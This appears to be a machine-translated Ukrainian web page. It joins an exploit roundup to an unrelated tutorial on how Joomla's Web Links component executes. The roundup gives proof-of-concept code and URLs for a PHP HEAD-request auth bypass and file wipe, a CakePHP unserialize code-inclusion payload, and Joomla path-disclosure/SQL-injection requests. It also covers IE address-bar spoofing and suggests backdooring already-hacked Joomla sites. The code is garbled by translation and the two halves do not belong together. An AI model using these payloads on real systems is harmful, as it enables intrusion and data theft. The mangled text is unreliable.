Посвідчення weblinks php. Послідовність роботи (виконання) компонентів Joomla

У поточному місяці багокопателі не хочуть нас балувати новими гучними експлойта в популярних додатках. Звичайно, опубліковано безліч advisory в продуктах відомих фірм, але дуже мале їх кількість містить більш-менш прийнятний PoC-коди. У нашому огляді я постарався зібрати найбільш значущі і повні уразливості з описаних останнім часом, так що влаштовуйся зручніше і насолоджуйся читанням.

Уразливість PHP при обробці HTTP Head-запитів

Brief

3 березня якийсь Адам Іванюк виявив цікаву особливість в інтерпретаторі PHP, який не зовсім коректно обробляє HEAD-запити. Дану уразливість дослідник назвав «HTTP HEAD method trick in php scripts».

Багато кодери розробляють свої PHP-скрипти, сподіваючись, що всі записані в них інструкції успішно виконуватися, чи не перервалися де-небудь посередині (особливо в коротких скриптах). Так і відбувається, якщо скрипт запитується кінцевим користувачем за допомогою методів GET, POST, PUT.

Але тобі повинно бути відомо, що існують і інші HTTP-методи - наприклад, HEAD. Якраз-таки при обробці цього методу в PHP і може виникнути діра в безпеці.

Дивимося один з вихідних інтерпретатора: ./main/SAPI.c, лінія 315:

if (SG (request_info) .request_method &&
! Strcmp (SG (request_info) .request_method, "HEAD"))
{
SG (request_info) .headers_only \u003d 1;
...

Коли надходять будь-які дані, виконується функція php_ub_body_write. Далі дивимося main / output.c, лінія 699:

if (SG (request_info) .headers_only) (
if (SG (headers_sent))
{
return 0;
}
php_header (TSRMLS_C);
zend_bailout ();
}

Тут видно, що при першому виведенні на екран і при використанні методу HEAD функція zend_bailout перериває роботу скрипта.

Exploit

$ Line \u003d "Nick:" .htmlspecialchars
($ _POST [ "nick"]). "

Text: ".htmlspecialchars
($ _POST [ "text"]). "

---

";
$ F \u003d fopen ( "book.txt", "r");
$ Data \u003d fread ($ f, fi lesize ( "book.txt"));
fclose ($ f);
$ F \u003d fopen ( "book.txt", "w");
$ Data \u003d $ line. $ Data;
echo $ data;
fwrite ($ f, $ data);
fclose ($ f);
?>

Тепер давай звернемося до цього скрипту за допомогою методу HEAD:

stream_context_get_default
(Array ( "http" \u003d\u003e array ( "method" \u003d\u003e "HEAD")));
print_r (get_headers ( "http://site.com/guestbook.php"));
?>

Як і слід було очікувати, наша гостьова книга зупинить своє виконання на сходинці «echo $ data;», таким чином файл book.txt просто-напросто обнулится.
Даний приклад носить скоріше деструктивний характер. У другому прикладі ми зможемо обійти авторизацію в примітивній адмінки:

session_start ();
echo "A long string contains about 4090 characters";
$ _SESSION [ "admin"] \u003d 1;
if (! isset ($ _ POST [ "pass"]) ||
$ _POST [ "pass"]! \u003d "Somepassword")
{
echo " Wrong or empty password.
";
$ _SESSION [ "admin_level"] \u003d 0;
}
?>

В цьому скрипті при заході звичайними методами встановлюється адміністративна змінна в сесії. Потім, якщо користувач ввів неправильний пароль, ця змінна обнуляється і користувач не стає адміном.

Якщо ми звернемося до адмінки через HEAD, її виконання перерветься на шматку коду з «echo», таким чином адміністративна змінна не обнулится, і ми зможемо спокійно бродити по закритій частині програми. Тут треба врахувати, що в більшості веб-серверів значення буферизації виведення встановлено рівним 4096 байт, так що в робочому прикладі нам може знадобитися рядок 'A long string contains about 4090 characters'.

Exploit

• PHP<= 5.3.5

Solution

На момент публікації огляду останньою версією PHP була версія 5.3.5. У ній немає ніяких виправлень, що стосуються даного бага, так що можу лише порадити уважно переглянути вихідні своїх скриптів на предмет непередбачених ситуацій при використанні методу HEAD.

Виконання довільного коду в CakePHP

Brief

CakePHP - це найвідоміший (більш 7 000 000 згадок в Гуглі) програмний каркас для створення веб-додатків, написаний на мові PHP і побудований на принципах відкритого ПЗ. CakePHP реалізує патерн «Модель-Вид-Контролер» (MVC).

Спочатку даний фреймворк створювався як клону популярного Ruby on Rails, багато ідей були запозичені саме звідти:

• Своя файлова структура;
• підтримка безлічі плагінів;
• абстракція даних (PEAR :: DB, ADOdb і власна розробка Cake);
• підтримка безлічі СУБД (PostgreSQL, MySQL, SQLite, Oracle).

Не дивно, що на настільки примітний програмний продукт звернено пильну увагу багатьох пентестеров. Не так давно людина під ніком felix знайшов в даному фреймворку цікавий баг, пов'язаний з чарівними методами і використанням функції unserialize (докладніше про даному класі вразливостей читай в торішніх номерах журналу).

Для початку відкриваємо компонент. / Libs / controller / components / security.php і шукаємо наступний код, який відповідає за захист від XSRFатак за допомогою POST-запитів:

function _validatePost (& $ controller)
{
...
$ Check \u003d $ controller-\u003e data;
$ Token \u003d urldecode ($ check [ "_ Token"] [ "fi elds"]);
if (strpos ($ token, ":")) (
list ($ token, $ locked) \u003d explode ( ":", $ token, 2);
}
$ Locked \u003d unserialize (str_rot13 ($ locked));
...
?>

Тут масив $ check містить наші POST-дані, а змінна $ locked - це обфусцірованная за допомогою функції str_rot13 () серіалізовані рядок, яка повністю знаходиться під нашим контролем.

На цьому місці варто зробити невеличкий відступ для тих, хто не читав відповідні статті в] [, і коротко розповісти про баг, що проявляється в чарівних методах PHP. Отже, в PHP версії 5 з'явилася базова концепція ООПпрограммірованія: конструктор і деструктор. Конструктор реалізується за допомогою методу «__construct», а деструктор - за допомогою методу «__destruct». Після закінчення своєї роботи і при виклику через функцію unserialize () кожен об'єкт виконує свій власний __ destruct-метод, якщо він прописаний в коді.

Тепер повернемося до нашого фреймворку і подивимося на деструкцію App-класу з файлу. / Libs / configure.php:

function __destruct ()
{
if ($ this -\u003e __ cache)
{
$ Core \u003d App :: core ( "cake");
unset ($ this -\u003e __ paths);
Cache :: write ( "dir_map", array_fi lter ($ this -\u003e __ paths),
"cake_core");
Cache :: write ( "fi le_map", array_fi lter ($ this -\u003e __ map),
"cake_core");
Cache :: write ( "object_map", $ this -\u003e __ objects,
"cake_core");
}
}

З наведеного коду можна зрозуміти, що даний метод може бути скомпрометований шляхом запису довільних значень в об'єкт Cache. Найцікавіший ключ для злому - це 'file_map'. Він керує зв'язками між класами і відповідними PHP-файлами, а також використовується для подгрузки додаткових класів під час виконання скрипта.

Реальний код для завантаження класів виглядає трохи складніше, але все це зводиться до наступного коду з методу __load всередині класу App:

...
if (fi le_exists ($ fi le)) (
if (! $ this-\u003e return) (
require ($ fi le);
$ This -\u003e __ loaded [$ fi le] \u003d true;
}
return true;
...
?>

Бінго! Шляхом підміни змінної $ file ми зможемо проінклудіть свій власний PHP-код! Причому це буде самий справжній Remote File Inclusion баг - таким чином, нам не знадобляться ніякі додаткові хитрощі з завантаженням локальних файлів на сервер. Однак автор знайденої уразливості пропонує LFI-варіант експлуатації цієї дірки, тому що CakePHP використовує базується на файлах локальний кеш, який знаходиться в серіалізірованной формі певною зломщику директорії.

Exploit

Як невеликий PoC для генерації отруйної серіалізовані рядки felix пропонує наступний код:

$ X \u003d new App ();
$ X -\u003e __ cache \u003d 1;
$ X -\u003e __ map \u003d array ( "Core" \u003d\u003e array (
"Router" \u003d\u003e "../tmp/cache/persistent/cake_core_fi le_map"),
"Foo" \u003d\u003e "");
$ X -\u003e __ paths \u003d array ();
$ X -\u003e __ objects \u003d array ();
echo serialize ($ x);
?>

Звичайно, попередньо ти повинен проінклудіть необхідні класи з CakePHP. Існує також і повнофункціональний експлойт на Python, знайти який ти зможеш за адресою malloc.im/burnedcake.py.

Даний сплойт повинен працювати в кожному додатку, побудованому на CakePHP, що використовує POST-форми з security-токенами, і в якому не змінено стандартне розташування файлів кеша. По дефолту експлойт виводить на екран конфиг бази даних, інші корисності легко додаються шляхом оновлено вбудованого PHP-пейлоада.

Targets

• CakePHP<= 1.3.5, CakePHP <= 1.2.8

Solution

Для виправлення описаної уразливості необхідно всього лише завантажити останню версію використовуваної тобою гілки CakePHP з сайту виробника cakephp.org.

Розкриття шляхів і потенційні SQL-ін'єкції в Joomla!

Brief

Джумла - це система управління вмістом, написана на мовах PHP і JavaScript і використовує як сховище базу даних MySQL. Є вільним програмним забезпеченням, поширюваним під ліцензією GNU GPL.

Якщо ти не стикався у своїй хеккерской діяльності з Joomla !, то ти просто-напросто живеш на іншій планеті :). У цьому огляді я хочу розповісти відразу про двох потенційних SQL-ін'єкції в різних гілках Джумли, які залишилися непоміченими і не розкручених.

Отже, перша ін'єкція була виявлена \u200b\u200bхлопцями з YGN Ethical Hacker Group (yehg.net/lab) в движку версії 1.5.21.

Як пишуть самі ресерчери, потенційні SQL-ін'єкції були виявлені ними в Joomla! 1.5.20 в рамках дослідження на XSS. Про ці баги негайно було повідомлено команді розробників движка, які незабаром випустили «пропатченних» версію 1.5.21. Слово «пропатченних» знаходиться в лапках, оскільки девелопери закрили очі на більшу частину адвісорі команди YEHG і сподівалися на те, що ці уразливості не повністю експлуатабельни, так як Joomla! має вбудовані рядкові фільтри безпеки.

В результаті багокопателі розкрили подробиці експлуатації виявлених потенційних SQL-ін'єкцій широкому загалу, ніж ми, звичайно ж, скористаємося.
Отже, відкриваємо файл. / Components / com_weblinks / models / category.php і знаходимо в ньому наступний код:

function _buildQuery ()
{
$ Fi lter_order \u003d $ this-\u003e getState ( "fi lter_order");
$ Fi lter_order_dir \u003d $ this-\u003e getState ( "fi lter_order_dir");
$ Fi lter_order \u003d JFilterInput :: clean ($ fi lter_order, "cmd");
$ Fi lter_order_dir \u003d
JFilterInput :: clean ($ fi lter_order_dir, "word");
// We need to get a list of all
// weblinks in the given category
$ Query \u003d "SELECT *".
"FROM #__weblinks".
"WHERE catid \u003d". (Int) $ this -\u003e _ id.
"AND published \u003d 1".
"AND archived \u003d 0".
"ORDER BY". $ Fi lter_order. "".
$ Fi lter_order_dir. ", Ordering";
return $ query;
}

Тут видно, що змінні $ filter_order і $ filter_order_dir не проходять перевірку на сувору відповідність операторам SQL, перевірка йде лише шляхом використання стандартного методу clean з класу JFilterInput:

...
case "WORD":
$ Result \u003d (string) preg_replace ( "/ [^ A-Z _] / i", "", $ source);
break;
...
case "CMD":
$ Result \u003d (string)
preg_replace ( "/ [^ A-Z0-9 _.-] / i", "", $ source);
$ Result \u003d ltrim ($ result, ".");
break;
...

Таким чином, по дефолту ми отримуємо розкриття шляхів. Аналогічний баг в тих же самих змінних зовсім недавно був виявлений і в першій версії движка з нової гілки 1.6.

Exploit

По дефолту ми можемо скористатися лише розкриттям шляхів в Joomla!<= 1.5.21:

• /index.php?option\u003dcom_weblinks&view\u003dcategory&id\u003d2&fi lter_order_Dir \u003d & fi lter_order \u003d% 00 '
• /index.php?option\u003dcom_weblinks&view\u003dcategory&id\u003d2&fi lter_order_Dir \u003d '& fi lter_order \u003d asc

і в Joomla! 1.6.0:

• attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?fi lter_order \u003d yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, & fi lter_order_Dir \u003d 2 & limit \u003d 3 & limitstart \u003d 4
• attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?fi lter_order \u003d 1, & fi lter_order_Dir \u003d yehg.net.BBBBBBBBBBB, & limit \u003d 3 & limitstart \u003d 4

Однак багокопателі пропонують скористатися даними багами в уже похеканних інсталяціях Джумли в контексті протрояніванія движка: тобі необхідно всього лише видалити фільтри JFilterInput :: clean у змінних filter_order_Dir і filter_order, після чого можна необмежено користуватися модифікованою вразливістю.

Також існує інформація, що якісь спритні люди все-таки змогли обійти ці горезвісні фільтри, але експлойт знаходиться в глибокому публічному чаті.

Targets

• Joomla!<= 1.5.21, Joomla! 1.6.0

Solution

Як і завжди, не забуваємо оновлюватися з офіційного сайту розробника joomla.org. На момент написання огляду останніми версіями даної CMS були 1.5.22 і 1.6.0 відповідно.

Підміна адресного рядка в Microsoft Internet Explorer

Brief

Наостанок хочу розповісти про невеликий і вкрай забавний баг в ослику IE, який виявив хакер під ніком cyber flash. Даний баг дозволяє віддаленому користувачеві провести найпростішу спуфинг-атаку.

Уразливість існує через помилку під час оновлення панелі адресного рядка спливаючого вікна. Віддалений користувач може за допомогою спеціально сформованої веб-сторінки змусити браузер відображати тільки певну частину адреси сторінки в адресному рядку.

Exploit

Як приклад з підміною адресного рядка сам автор пропонує наступний PoC HTML-код:

content \u003d "text / html; charset \u003d windows -1252"\u003e




Click anywhere on this page!

Також cyber flash надає нам для тестів вже готову сторінку з PoC-кодом на keyloggeronline.com/misc/temp/about.htm.

Зайшовши на цю сторінку, ми побачимо напис з посиланням, яка запрошує нас перейти на сайт bing.com. Натиснувши на посилання, ми побачимо спливаюче вікно, в адресному рядку якого буде значитися той самий Бінг. Нижче буде перебувати ще одна посилання, що закликає завантажити новий Internet Explorer (причому, навівши курсор на «Download», ми не побачимо нічого підозрілого, хоча там знаходиться не нова версія браузера, а програма-псевдотроян від Сайбер Флеша).
Таким чином, зловмисник легко зможе підсунути користувачеві Ослика зловмисний файл.

Targets

• MS Internet Explorer 7, 8, 9

Solution

На даний момент дрібном'який все ще не виправили описану вразливість, так що, якщо ти використовуєш IE, як тимчасовий захід раджу бути уважніше з незнайомими спливаючими вікнами.

Точка входу в Joomla! компонент подібна у більшості компонентів. Для цього прикладу ми будемо використовувати один з компонентів ядра Joomla - Web Links (Посилання на сайти). Перший файл, який буде виконаний у front-end: ... / components / com_weblinks / weblinks.php.

Спочатку ми бачимо перевірку безпеки, призначену для впевненості, що ніхто не зможе викликати цю сторінку безпосередньо. Це стандарт, який повинен використовуватися у всіх ваших php-файлах (хоча є кілька винятків):

Ми перевіряємо рядок запиту, щоб подивитися, чи було відправлено певну назву контролера. Якщо так, ми переконуємося, що можемо завантажити необхідний файл в каталозі контролерів:

// Require specific controller if requested if ($ controller \u003d JRequest :: getWord ( "controller")) ($ path \u003d JPATH_COMPONENT. DS. "controllers". DS. $ controller. ".php"; if (file_exists ($ path)) (require_once $ path; ) else ($ controller \u003d "";))

Тепер ми створюємо екземпляр класу нашого контролера, використовуючи ім'я, яке визначили вище:

Як тільки завдання виконане, виробляємо редирект, якщо він потрібен:

// Redirect if set by the controller $ Controller -\u003e redirect ();

Клас контролера (Controller Class)

Загальний (характерний) контролер для компонента посилань знаходиться тут: ... / components / com_weblinks / controller.php.
Весь цей клас визначає метод display, який є використовуваним за замовчуванням, якщо користувач не визначає інше завдання (task).

defined ( "_JEXEC") or die ( "Restricted access"); jimport ( "Joomla.application.component.controller") ; / ** * Weblinks Component Controller * * @package Joomla * @subpackage Weblinks * @since 1.5 * / class WeblinksController extends JController ( / ** * Method to show a weblinks view * * @access public * @since 1.5 * / function display () ( // Set a default view if none exists if (! JRequest :: getCmd ( "view")) (JRequest :: setVar ( "view", "categories");) // update the hit count for the weblink if (JRequest :: getCmd ( "view") \u003d\u003d "weblink") ($ model \u003d & $ this -\u003e getModel ( "weblink"); $ model -\u003e hit ();) // View caching logic - simple ... are we logged in? $ User \u003d & JFactory :: getUser (); $ View \u003d JRequest :: getVar ( "view"); $ Viewcache \u003d JRequest :: getVar ( "viewcache", "1", "POST", "INT"); if ($ user -\u003e get ( "id") || ($ view \u003d\u003d "category" && $ viewcache \u003d\u003d 0)) (parent :: display (false);) else (parent :: display (true); )))

У цьому методі ми встановлюємо вид (подання) за замовчуванням: показ категорій, якщо інший вид не був переданий як параметр рядка запиту. Якщо необхідний вид - weblink, ми збільшуємо значення лічильника перегляду посилання. Потім ми встановлюємо значення змінної виду і викликаємо метод diplay нашого батьківського класу JController.
Варто звернути окрему увагу на виклик методу getModel. Він завантажує необхідну модель для компонента. У розглянутому прикладі, цей метод завантажить модель weblink, находущуюся тут: ... / components / com_weblinks / models / weblink.php.
Тут домовимося, що ми не запитували певне уявлення, і тому наш вид буде встановлений в categories.
Потім, ми відкриваємо клас уявлення.

Клас уявлення (види) (View Class)

Так як ми припускаємо, що хочемо уявлення категорій, це - наступний файл, який буде виконаний: ... / components / com_weblinks / views / categories / view.html.php

// Check to ensure this file is included in Joomla! defined ( "_JEXEC") or die ( "Restricted access"); jimport ( "Joomla.application.component.view") ; / ** * HTML View class for the WebLinks component * * @static * @package Joomla * @subpackage Weblinks * @since 1.0 * / class WeblinksViewCategories extends JView (function display ($ tpl \u003d null) (global $ mainframe; $ document \u003d & JFactory :: getDocument (); $ categories \u003d & $ this -\u003e get ( "data"); $ total \u003d & $ this -\u003e get ( "total"); $ state \u003d & $ this -\u003e get ( "state"); // Get the page / component configuration $ Params \u003d & $ mainframe -\u003e getParams (); $ Menus \u003d & JSite :: getMenu (); $ Menu \u003d $ menus -\u003e getActive (); // because the application sets a default page title, we need to get it // right from the menu item itself if (is_object ($ menu)) ($ menu_params \u003d new JParameter ($ menu -\u003e params); if (! $ menu_params -\u003e get ( "page_title")) ($ params -\u003e set ( "page_title", JText :: _ ( "Web Links"));)) else ($ params -\u003e set ( "page_title", JText :: _ ( "Web Links"));) $ document -\u003e setTitle ($ params -\u003e get ( "page_title ")); // Set some defaults if not set for params $ Params -\u003e def ( "comp_description", JText :: _ ( "WEBLINKS_DESC")); // Define image tag attributes if ($ params -\u003e get ( "image")! \u003d - 1) (if ($ params -\u003e get ( "image_align")! \u003d "") $ attribs [ "align"] \u003d $ params -\u003e get ( " image_align "); else $ attribs [" align "] \u003d" "; $ attribs [" hspace "] \u003d 6; // Use the static HTML library to build the image tag $ Image \u003d JHTML :: _ ( "image", "images / stories /". $ Params -\u003e get ( "image"), JText :: _ ( "Web Links"), $ attribs); ) For ($ i \u003d 0; $ i< count ($categories ) ; $i ++ ) { $category =& $categories [ $i ] ; $category -> link \u003d JRoute :: _ ( "Index.php? Option \u003d com_weblinks & view \u003d category & id \u003d". $ Category -\u003e slug); // Prepare category description $ Category -\u003e description \u003d JHTML :: _ ( "content.prepare", $ category -\u003e description); ) $ This -\u003e assignRef ( "image", $ image); $ This -\u003e assignRef ( "params", $ params); $ This -\u003e assignRef ( "categories", $ categories); parent :: display ($ tpl); ))?\u003e

І знову, це - дуже простий клас з одним методом display. Більша частина логіки тут є специфічною для компонента посилань, але якщо придивитися можна знайти функціональність використовувану в більшості класів уявлень компонентів. В кінці методу display цей клас викликає батьківський (JView) метод display, Передаючи назву шаблону для відображення. Якщо назва шаблону відображення не передається, використовується шаблон «default».
І в останніх, ми відкриваємо клас шаблону.

Клас шаблону (Template Class)

Домовимося що певне ім'я шаблону не було передано, таким чином буде використаний шаблон по умпочанію «default». В цьому випадку, наступний файл, який буде розглянуто: ... / components / com_weblinks / views / categories / tmpl / default.php
-\u003e escape ($ this -\u003e params -\u003e get ( "page_title")); ?\u003e